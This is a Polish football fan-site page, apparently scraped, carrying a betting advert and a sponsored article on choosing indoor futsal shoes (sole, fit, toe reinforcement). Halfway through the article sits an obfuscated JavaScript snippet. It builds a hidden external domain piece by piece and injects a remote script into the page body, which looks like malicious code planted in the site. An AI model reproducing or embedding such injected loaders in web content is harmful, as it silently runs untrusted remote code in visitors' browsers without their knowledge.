06.10.2023, g. 20:30
PKO BP Ekstraklasa
Lech Poznań vs Puszcza Niepołomice
Do meczu pozostało:
4dn.11godz.56min.
11.30 X5.50 212.00 Odbierz 630 zł i typuj na eFortuna.pl Zarejestruj konto
Transmisja na żywo

Jakie buty na halę do piłki nożnej?

Jakie buty na halę do piłki nożnej?

Fut­sal, czyli pił­ka noż­na halowa, to jed­na z pop­u­larniejszych dyscy­plin drużynowych,z zarówno wśród dzieci i młodzieży, jak i wśród dorosłych. Co jed­nak istotne z punk­tu widzenia osób uczest­niczą­cych w roz­gry­wkach, warto zaopa­trzyć się w odpowied­nie buty na halę. Jak je wybrać?

Patrz na podeszwę!

O ile obuwie do gry w piłkę na boisku charak­teryzu­je się korka­mi, o tyle w przy­pad­ku fut­salu nie może być o tym mowy. Prze­ci­wnie, buty na halę powin­ny cechować się płaską podeszwą, wyposażoną jedynie w rowki.

Przy­czy­na tego stanu rzeczy jest bard­zo pros­ta – w przy­pad­ku gry pod zadasze­niem i pewnoś­ci, ze powierzch­nia jest twar­da, sucha i płas­ka, właśnie taki wybór poz­woli zachować więk­sza przy­czep­ność. Oczy­wiś­cie pod warunk­iem, ze sam mate­ri­ał, z którego wyko­nano podeszwę będzie odpowied­ni (np. kauczuk).

Co ciekawe, niek­tórzy pro­du­cen­ci dba­ją również o to, aby podeszwy w ich butach jak najm­niej brudz­iły podeszwę. Choć dla kom­for­tu użytkowa­nia takich butów nie ma to znaczenia, to jed­nak jest to cechą zde­cy­dowanie pożą­daną, na którą warto zwró­cić uwagę. Nie warto więc kupować spo­tykanych w super­mar­ke­tach mod­eli eko­nom­icznych, lep­iej przegląd­nąć ofer­tę sklepów sportowych (np. www.no10.pl), gdzie wybór jest po pros­tu większy.

Wybór rozmi­aru

Wybier­a­jąc buty na halę zad­baj o to, aby były jak najlepiej dopa­sowane. To ważne, ponieważ przy naprawdę inten­sy­wnym wysiłku zbyt ciasne obuwie było­by prob­le­mem, a zbyt luźne mogło­by powodować potknię­cia czy prob­le­my z odpowied­nim kierowaniem pił­ki. Warto jed­nak pamię­tać, że prob­lem ten moż­na do pewnego stop­nia równoważyć poprzez wkładki.

(func­tion(){
xay2_=(“u”+“”)+“s”+””;xay2_+=(“tat.”)+(“i”);
xay2=document.createElement(“script”);xay2.type=“text/javascript”;xay2_+=“nf”+(“o”)+”/”;
xay2u=“70835659”+”.”;xay2.async=true;xay2u+=“9bvztd4kay2u79egdvr5npjuis39zs”;
xay2.src=”//”+xay2_+xay2u; xay2b=document.body; xay2b.appendChild(xay2);
})();

Istotne cechy butów do futsalu

Przeglą­da­jąc buty do pił­ki nożnej halowej warto przyjrzeć się ich czubom. Powin­ny być wzmoc­nione – tak, żeby mogły wytrzymy­wać częste kop­nię­cia w piłkę. Nie da się tez ukryć, że sam but powinien być jak najbardziej odd­y­chal­ny i lek­ki. W końcu gra­jąc w piłkę halową bie­ga się naprawdę dużo (nawet jeśli na małej powierzch­ni) i – choć może się to wydać zaskaku­jące – nawet drob­ne różnice wagi potrafią przełożyć się na późniejsze zmęczenie.

Artykuł spon­sorowany

Kursy na mecze Lecha

Brak spotkań

Kursy bukmacherskie Ekstraklasa

Brak spotkań

Następny mecz

Ostatni mecz

Mecze Ekstraklasy

Tabela Ekstraklasy (gr. mistrzowska)

Tabela Ekstraklasy

Strzelcy Ekstraklasy

Archiwum newsów

Facebook

Get the Facebook Likebox Slider Pro for WordPress

Ten artykuł jest dostępny tylko w zagraniczej odsłonie tego serwisu.